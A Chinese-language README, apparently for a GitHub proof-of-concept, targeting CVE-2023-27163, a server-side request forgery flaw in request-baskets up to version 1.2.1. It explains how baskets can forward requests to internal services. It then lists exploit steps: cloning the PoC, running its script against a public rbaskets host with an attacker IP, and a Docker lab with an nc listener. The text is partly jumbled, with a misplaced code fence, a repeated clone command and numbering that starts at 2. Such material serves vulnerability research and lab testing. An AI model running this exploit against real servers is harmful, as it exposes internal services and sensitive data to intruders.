本仓库包含 CVE-2023-27163 的概念验证代码 (PoC),该漏洞是 request-baskets 直至 1.2.1 版本 中存在的一个服务端请求伪造 (SSRF) 漏洞。攻击者可利用精心构造的 API 请求,通过 /api/baskets/{name} 组件访问网络资源和敏感信息。
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <攻击者 IP>
Request-baskets 是一个 Web 应用程序,用于收集并注册特定路由上的请求,该路由称为“篮子”(basket)。在创建篮子时,用户可以指定另一台服务器来转发请求。问题在于,用户可以指定非预期的服务,例如网络封闭的应用程序。
例如:假设服务器上运行着 Request-baskets(端口 55555)和一个 Flask Web 服务器(端口 8000)。Flask 同时配置为仅与本地主机交互。通过创建一个将请求转发到 http://localhost:8000 的篮子,攻击者便可以访问此前受限的 Flask Web 服务器。

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git
2. 下载 PoC
```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/